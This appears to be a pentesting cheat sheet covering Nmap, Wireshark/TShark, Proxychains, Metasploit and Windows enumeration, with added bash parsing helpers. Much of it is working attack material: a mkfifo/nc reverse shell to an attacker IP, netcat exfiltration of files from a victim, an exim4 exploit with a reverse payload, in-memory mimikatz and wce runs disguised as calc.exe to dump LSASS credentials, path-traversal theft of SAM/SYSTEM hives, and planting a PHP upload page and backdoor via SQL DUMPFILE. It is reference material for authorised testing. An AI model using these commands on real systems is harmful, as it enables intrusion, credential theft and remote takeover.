rabx/Pentesting-CheatSheet

Pentesting Cheat Sheet

version .01

Various findings, notes, and more from Pentesting all in one location.

Table of Contents

  1. Nmap
  2. Wireshark
  3. TShark
  4. Proxychains
  5. Metasploit
  6. Meterpreter tricks
  7. Transfer files
  8. Shells
  9. Windows
  10. PHPMyAdmin / SQL shell upload

Nmap

Network scanner.

Introduction on port state

  • Open: the target accepted the connection (TCP SYN/ACK) or answered the UDP probe, so something is listening.
  • Closed: the host is reachable but nothing listens on the port. A SYN scan gets a TCP RST back; a UDP scan gets an ICMP port unreachable.
  • Filtered: blackhole. Either nothing comes back at all, or an ICMP error (host/port/admin prohibited) is returned by an IDS or stateful firewall in the path. Simply put, Nmap cannot confirm the real state of the port, and the verdict can change with the scanning technique.
  • -sV or -A can help detect the true state: a version probe that gets an application-level answer proves the port is open.
  • --scanflags SYNFIN sets a custom TCP flag combination (here SYN+FIN) to try to get past firewall rules that only match a plain SYN; compare the result with a normal -sS.

Getting all host names on a network (find the DNS servers, then try a zone transfer):

```bash
nmap -sS 10.11.1.201-254 -p53 -T4 -oG - | grep "open"   # hosts answering on tcp/53
nano /etc/resolv.conf                                     # point nameserver at one of them
host -l dc.name > hostsNames                              # AXFR of the zone (fails if transfers are restricted)
cat hostsNames | cut -f1,4 -d " "                         # "name ip" pairs
```
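The same pipeline with the two parsing steps pulled into functions, so they can be run over saved output or fed straight from the live commands. This is an added example, not code from the original cheat sheet: NMAP_GREPABLE and ZONE_DUMP are constructed stand-ins for real "nmap -oG -" and "host -l" output, and the zone lab.local and its addresses are made up.

```bash
# Constructed sample of "nmap -sS <range> -p53 -oG -" output. Grepable output has
# one "Host:" line per host with a Ports: field; "53/open/" marks a live DNS server.
NMAP_GREPABLE=$(printf '%s\n' \
  '# Nmap 7.94 scan initiated' \
  'Host: 10.11.1.220 ()   Status: Up' \
  'Host: 10.11.1.220 ()   Ports: 53/open/tcp//domain///' \
  'Host: 10.11.1.221 ()   Ports: 53/filtered/tcp//domain///' \
  'Host: 10.11.1.229 (dc.lab.local)   Ports: 53/open/tcp//domain///' \
  '# Nmap done')

# Constructed sample of "host -l lab.local <server>" (an AXFR). A records print as
# "name has address ip"; other record types must be filtered out.
ZONE_DUMP=$(printf '%s\n' \
  'lab.local name server dc.lab.local.' \
  'dc.lab.local has address 10.11.1.229' \
  'fs01.lab.local has address 10.11.1.230' \
  'dc.lab.local has IPv6 address fd00::1' \
  'www.lab.local has address 10.11.1.231')

# dns_servers: IPs from grepable nmap output whose tcp/53 state is "open"
# (filtered hosts are skipped, since we cannot query them anyway)
dns_servers() {
    awk '/^Host:/ && /53\/open\// { print $2 }' | sort -u
}

# zone_hosts: "name ip" pairs from host -l output, A records only,
# with the trailing dot of fully-qualified names removed
zone_hosts() {
    awk '$2 == "has" && $3 == "address" { sub(/\.$/, "", $1); print $1, $4 }'
}

printf '%s\n' "$NMAP_GREPABLE" | dns_servers
printf '%s\n' "$ZONE_DUMP" | zone_hosts

# Live use (not run here): query each discovered server directly instead of
# editing /etc/resolv.conf. host -l takes the zone name, then the server.
#   for srv in $(nmap -sS 10.11.1.201-254 -p53 -oG - | dns_servers); do
#       host -l lab.local "$srv" | zone_hosts
#   done
```

Passing the server to host -l avoids touching the system resolver, and a server that refuses AXFR simply produces no "has address" lines, so the loop moves on to the next one.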


Wireshark

Network analyzer with UI.

Introduction on UI

  • Packet List pane (top) shows the captured traffic, one line per frame.
  • Packet Details pane (middle) shows the protocols and fields of the selected packet as a tree that can be expanded and collapsed.
  • Packet Bytes pane (bottom) is a hex/ASCII view of the raw frame, like a hex editor.
  • Display filters (Wireshark syntax, e.g. ip.addr == 10.0.0.5 && http) only change what is shown; everything captured is kept.
  • Capture filters (BPF syntax, e.g. port 80 or port 443) decide what is captured in the first place. Capture filters save disk space, but whatever they drop is gone for good, so keep them broad when you are not sure what you will need.

TShark

Network analyzer from the CLI (Wireshark's command-line twin: -f takes a capture filter, -Y a display filter).

Capture with a capture filter, rotating the output file every 5 kB and stopping after 3 files:

```bash
tshark -i eth0 -f "port 80 or port 443 or port 53" -b filesize:5 -a files:3 -w /tmp/CAPTURED.pcap
cd /tmp; watch -n 1 "ls -ltr"    # in another terminal, watch the files appear
```

Capture filter with several conditions:

```bash
tshark -i eth0 -f "port 80 or port 443"
```

Reading a capture and printing selected fields (-T fields picks the output format, each -e names a field in display-filter syntax):

```bash
tshark -r /tmp/testCap.pcap -T fields -e ip.src -e ip.dst
```

Which hosts asked for which names. -Y dns skips non-DNS frames, and uniq only merges adjacent duplicates, so sort first:

```bash
tshark -r sampleCapture_1.pcap -Y dns -T fields -e dns.qry.name -e ip.src | sort | uniq -c | sort -rn
```
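The sort | uniq -c step above done as reusable functions, so the same aggregation can be applied to any saved "-T fields" output. This is an added example, not code from the original cheat sheet. SAMPLE is a constructed stand-in for the output of "tshark -r capture.pcap -Y dns -T fields -e ip.src -e dns.qry.name" (tab-separated, one frame per line, and an empty name for a DNS frame that carried no query); the addresses and names are made up.

```bash
TAB=$(printf '\t')

# Constructed tshark field output: "src<TAB>qname" per frame. The 10.0.0.9 line
# has an empty query name, as tshark prints when a frame lacks the field.
SAMPLE=$(printf '%s\n' \
  "10.0.0.5${TAB}intranet.example.local" \
  "10.0.0.5${TAB}intranet.example.local" \
  "10.0.0.7${TAB}updates.example.com" \
  "10.0.0.9${TAB}" \
  "10.0.0.5${TAB}c2-lookalike.example.net" \
  "10.0.0.7${TAB}updates.example.com" \
  "10.0.0.7${TAB}updates.example.com")

# count_queries: read "src<TAB>qname" lines on stdin, print "count<TAB>src<TAB>qname"
# sorted most frequent first. Frames with an empty query name are dropped.
count_queries() {
    awk -F'\t' '$2 != "" { n[$1 "\t" $2]++ }
        END { for (k in n) print n[k] "\t" k }' |
    sort -t "$TAB" -k1,1nr -k2,2
}

# top_query: the most frequent (src, qname) pair as "src<TAB>qname"
top_query() {
    count_queries | head -n 1 | cut -f2,3
}

# queries_from SRC: every distinct name a given source asked for, one per line
queries_from() {
    awk -F'\t' -v src="$1" '$1 == src && $2 != "" { print $2 }' | sort -u
}

printf '%s\n' "$SAMPLE" | count_queries

# Live use (not run here):
#   tshark -r sampleCapture_1.pcap -Y dns -T fields -e ip.src -e dns.qry.name | count_queries
#   tshark -r sampleCapture_1.pcap -Y dns -T fields -e ip.src -e dns.qry.name | queries_from 10.0.0.5
```

Keeping the field order as "-e ip.src -e dns.qry.name" matters: the functions key on column 1 being the source, so swapping the -e options swaps the meaning of the output.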

Decrypting Wireless Traffic

You need the pre-shared key and the SSID (recover them with aircrack-ng beforehand), and the capture must include the client's WPA 4-way handshake, otherwise Wireshark cannot derive the session keys.

Wireshark > Edit > Preferences > Protocols > IEEE 802.11 > Enable decryption > Decryption keys. Add a key of type wpa-pwd in the format password:ssid (e.g. p@assw0rd:Xfinity1111).

Decoding video

  1. Set the display filter to: ip.addr == (destination ip) && http
  2. Locate the HTTP/1.1 response with Content-Type video/mp2t.
  3. In the Packet Details pane select Media Type > Media Type (the binary payload is highlighted in the bytes pane), right-click > Export Packet Bytes and save the file.
  4. Open the file in VLC; it does not need a file extension.

If the response spans many TCP segments, File > Export Objects > HTTP reassembles and saves the whole object in one step.


Proxychains

General Usage

Open a SOCKS proxy over SSH, point proxychains at it, then push tools through it. proxychains reads ./proxychains.conf from the current directory before /etc/proxychains.conf, so a per-engagement copy is easiest. The port in the config must match the -D port (8090 below):

```bash
ssh -D 127.0.0.1:8090 -N <user>@<pivot host> -p 22000
cd ~/Desktop/proxy-folder/
cat /etc/proxychains.conf | sed "s/127.0.0.1 9050/127.0.0.1 8090/g" > ./proxychains.conf
proxychains nmap -sT -Pn -p80 10.1.1.230
proxychains nmap -sT -Pn -sV -n 10.1.1.236 -p 21,25,80
```

Only full TCP connects go through a SOCKS proxy, hence -sT and -Pn (no SYN scan, no ping); -n stops Nmap from doing DNS lookups outside the tunnel.

```bash
proxychains wget http://10.2.2.86/../../../../../WINDOWS/repair/SYSTEM -O SYSTEM
proxychains wget http://10.2.2.86/../../../../../WINDOWS/repair/sam -O sam
```

Connecting to a Squid HTTP proxy running on port 3128

Configure proxychains (comment out the SOCKS line, add the HTTP proxy):

```
#socks4 127.0.0.1 9050
http 192.168.195.150 3128
```

Run the scan. 127.0.0.1 is interpreted by the proxy, so this scans the proxy host's own loopback services:

```bash
proxychains nmap -sT -sV -Pn -n -vvv 127.0.0.1
```

Or tunnel a single port with proxytunnel and scan that locally:

```bash
proxytunnel -a 25 -p 192.168.22.57:3128 -d 127.0.0.1:25
nmap -sV -p25 127.0.0.1
```

Exploiting through the proxy with Metasploit:

```
proxychains msfconsole
use exploit/unix/smtp/exim4_string_format
set RHOSTS 127.0.0.1
set RPORT 25
set PAYLOAD cmd/unix/reverse
set LHOST <ipv4 address of attacking machine>
set LPORT 4444
run
```

A reverse payload only works if the target can reach LHOST directly; the outbound proxy does not carry the connection back. If it cannot, use a bind payload and reach it through the proxy, which is what the nc trick below does for port 4444.

Or by hand with nc: connect to the proxy and ask it for a tunnel (end the request with an empty line; a "200 Connection established" reply means you are now talking to the target port):

```
nc -v 192.168.195.150 3128
CONNECT 127.0.0.1:4444 HTTP/1.0

```
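Two helpers around the Squid CONNECT technique, written here as an added example rather than taken from the original cheat sheet: write_proxychains_conf generates a per-engagement proxychains.conf for a given proxy type/host/port instead of sed-ing the system file, and connect_request/tunnel_open build and check the HTTP CONNECT handshake that the nc one-liner types by hand. The proxy address defaults are the lab values from above; the reply strings used for checking are constructed.

```bash
PROXY_HOST=${PROXY_HOST:-192.168.195.150}
PROXY_PORT=${PROXY_PORT:-3128}

# write_proxychains_conf TYPE HOST PORT FILE
# proxychains looks for ./proxychains.conf in the current directory before
# /etc/proxychains.conf, so writing it where you run the tools is enough.
# proxy_dns pushes name resolution through the proxy as well, so hostnames
# given to nmap/wget do not leak to the local resolver.
write_proxychains_conf() {
    printf 'strict_chain\nproxy_dns\ntcp_read_time_out 15000\ntcp_connect_time_out 8000\n[ProxyList]\n%s %s %s\n' \
        "$1" "$2" "$3" > "$4"
}

# connect_request TARGET_HOST TARGET_PORT: the exact bytes to send to the proxy,
# CRLF line endings and the empty line that terminates the request header.
connect_request() {
    printf 'CONNECT %s:%s HTTP/1.0\r\nHost: %s:%s\r\n\r\n' "$1" "$2" "$1" "$2"
}

# tunnel_status: read the proxy's reply on stdin and print the status code.
# Squid answers "HTTP/1.0 200 Connection established" when the tunnel is up;
# 403 means an ACL refused the destination, 407 means it wants credentials.
tunnel_status() {
    head -n 1 | tr -d '\r' | awk '{ print $2 }'
}

# tunnel_open: succeed only on a 200 reply
tunnel_open() {
    [ "$(tunnel_status)" = "200" ]
}

# Interactive use (not run here): send the CONNECT, keep stdin open with cat so
# you can talk to the tunnelled port, e.g. the proxy host's own SMTP service.
#   write_proxychains_conf http "$PROXY_HOST" "$PROXY_PORT" ./proxychains.conf
#   (connect_request 127.0.0.1 25; cat) | nc -v "$PROXY_HOST" "$PROXY_PORT"
```

Squid normally allows CONNECT only to port 443 (the default Safe_ports/SSL_ports ACLs), so a 403 on port 25 or 4444 is the proxy policy talking, not the target being down; proxytunnel's -a flag is there to check one port at a time for exactly that reason.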


Metasploit

Auto migration, so the session survives when the exploited process dies:

```
set InitialAutoRunScript migrate -f
```

PrependMigrate (any Windows payload): the payload spawns a new process and migrates into it before the exploited service crashes, and you can choose the process name. Default is false, and the default spawned process is rundll32.exe; PrependMigrateProc picks another. Generate a standalone exe, then upload and run it from a meterpreter session (newer Metasploit spells the generate step "generate -f exe -o /tmp/bob.exe"):

```
set PrependMigrate true
set PrependMigrateProc svchost.exe
generate -t exe -f /tmp/bob.exe
cd temp
upload /tmp/bob.exe
execute -H -f C:\temp\bob.exe
```

Meterpreter tricks

Run a credential-dumping tool from memory on the target: -m executes from memory, -d is the process name the target sees, -H hides the window, -i/-c give an interactive channel, -a passes arguments. Pick the 32- or 64-bit binary (wce32/wce64, Win32/x64) to match the target process; both tools read LSASS and so need SYSTEM or debug privilege.

```
execute -H -i -c -m -d calc.exe -f /usr/share/wce/wce32.exe -a -w
execute -H -i -c -m -d calc.exe -f /usr/share/mimikatz/Win32/mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'
```


Transfer files

Transfer files with NC

Kali/Receiving:

```bash
nc -l -p 4444 > av.zip
```

Victim/Sending (-w 3 closes the connection 3 seconds after stdin is exhausted):

```bash
nc -w 3 192.168.27.10 4444 < av.zip
```

Compare a checksum on both ends (md5sum/sha256sum, or certutil -hashfile on Windows) before trusting the copy; nc reports nothing if the transfer is cut short.

Shells

Reverse shell listener (from Kali):

```bash
nc -lvnp 3333
```

On victim (no -l here: the victim connects out to Kali):

```bash
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.24.10 3333 > /tmp/f
```

How it works: whatever nc receives from the attacker is written into the named pipe /tmp/f, cat reads it back out as stdin for sh, and sh's stdout and stderr go into nc's stdin and back to the attacker. The fifo is what lets one nc process carry both directions.

=========================


Windows

Checking installed patches (compare the HotFixIDs against the KBs of known privilege-escalation fixes):

```
wmic qfe get Caption,Description,HotFixID,InstalledOn
```

Finding files likely to hold credentials (run from C:\; dir accepts several patterns at once):

```
cd C:\
dir /s *pass* *cred* *vnc* *.config
```


-- PHPMyAdmin / SQL shell upload

Works when the MySQL account has the FILE privilege and secure_file_priv allows writing under the web root; XAMPP's default root account qualifies.

  1. Create a database and then a table to hold the file contents:

```sql
CREATE DATABASE Upload;
CREATE TABLE Upload.cake (form VARCHAR(1000) NOT NULL) ENGINE = MYISAM;
```

  2. Insert the PHP upload-form source as the row value (the form source is not reproduced here; any small PHP page with a file input and a move_uploaded_file() call will do):

```sql
INSERT INTO Upload.cake VALUES ('<php upload form source>');
```

  3. Dump the row into a file called upload.php inside the web root. DUMPFILE writes the single row verbatim, unlike OUTFILE, which adds escaping and line terminators:

```sql
SELECT * INTO DUMPFILE 'C:/xampp/htdocs/upload.php' FROM Upload.cake;
```

  4. Visit 192.168.195.123/upload.php and upload any shell to run whatever command:

http://192.168.195.123/simple-backdoor.php?cmd=whoami%00

nt authority\system
